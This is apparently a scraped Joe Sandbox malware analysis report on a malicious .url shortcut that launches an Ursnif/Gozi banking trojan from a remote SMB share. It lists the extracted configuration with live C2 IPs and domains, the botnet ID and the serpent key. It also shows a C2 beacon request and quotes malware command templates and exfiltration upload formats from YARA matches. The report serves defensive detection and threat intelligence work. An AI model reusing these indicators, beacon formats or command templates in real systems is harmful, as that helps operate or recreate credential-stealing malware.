Edit tour

Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name:	marzo.txt.url
Analysis ID:	826967
MD5:	d8dc17b22192b297073d5749a7b49966
SHA1:	606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256:	f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
Infos:

Detection

Ursnif

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

Snort IDS alert for network traffic

Writes or reads registry keys via WMI

Found malicious URL file

Writes registry values via WMI

Opens network shares

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Creates a window with clipboard capturing capabilities

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 6104 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)

server.exe (PID: 6612 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)

server.exe (PID: 6832 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Gozi, Ursnif	2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.	No Attribution	http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/ https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007 https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
marzo.txt.url	Methodology_Suspicious_Shortcut_SMB_URL	Detects remote SMB path for .URL persistence	@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)	0x35:$file: URL=file://4 0x8a:$url_clsid: [{000214A0-0000-0000-C000-000000000046}] 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x644d:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6aa5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: server.exe PID: 6612	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 6612	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x3def:$a5: filename="%.4u.%lu" 0x3fa5:$a5: filename="%.4u.%lu" 0x78a9:$a5: filename="%.4u.%lu" 0x7a5f:$a5: filename="%.4u.%lu" 0x39a2:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x745c:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3b16:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3eef:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x40a7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5d81:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5e62:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x6005:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x75d0:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x79a9:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7b61:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4307:$a9: &whoami=%s 0x7dc1:$a9: &whoami=%s 0x42f0:$a10: %u.%u_%u_%u_x%u 0x7daa:$a10: %u.%u_%u_%u_x%u 0x4210:$a11: size=%u&hash=0x%08x 0x7cca:$a11: size=%u&hash=0x%08x
Process Memory Space: server.exe PID: 6612	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x3e96:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x404e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x7950:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x7b08:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x39a2:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x39ff:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x745c:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x74b9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3dbb:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x3f71:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x7875:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x7a2b:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x41a1:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x447a:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x7c5b:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x7f34:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x4243:$a9: Software\AppDataLow\Software\Microsoft\ 0x4517:$a9: Software\AppDataLow\Software\Microsoft\ 0x4ed0:$a9: Software\AppDataLow\Software\Microsoft\ 0x7cfd:$a9: Software\AppDataLow\Software\Microsoft\ 0x7fd1:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: server.exe PID: 6832	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 6832	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1e45:$a5: filename="%.4u.%lu" 0x1ffb:$a5: filename="%.4u.%lu" 0x19f8:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1b6c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1f45:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x20fd:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa974:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xaa55:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xabf8:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x235d:$a9: &whoami=%s 0x2346:$a10: %u.%u_%u_%u_x%u 0x2266:$a11: size=%u&hash=0x%08x 0x1eb8:$a12: &uptime=%u 0x2072:$a12: &uptime=%u 0x1ab5:$a13: %systemroot%\system32\c_1252.nls 0x2416:$a14: IE10RunOnceLastShown_TIMESTAMP
Process Memory Space: server.exe PID: 6832	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x1eec:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x20a4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x19f8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1a55:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1e11:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1fc7:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x21f7:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x24d0:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x2299:$a9: Software\AppDataLow\Software\Microsoft\ 0x256d:$a9: Software\AppDataLow\Software\Microsoft\ 0x306e:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 13 entries

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.3 - Destination IP: 5.44.43.17

Timestamp:	192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785
SID:	2033203
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.3 - Destination IP: 5.44.43.17

Timestamp:	192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785
SID:	2033204
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		5_2_02BE1508

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80

Source: Joe Sandbox View

ASN Name: MGNHOST-ASRU MGNHOST-ASRU

Source: Joe Sandbox View

IP Address: 192.229.221.95 192.229.221.95

Source: global traffic

HTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/~
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr

Source: unknown

DNS traffic detected: queries for: checklist.skype.com

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
marzo.txt.url

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Ursnif

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report marzo.txt.url

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Ursnif

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Windows Analysis Report
marzo.txt.url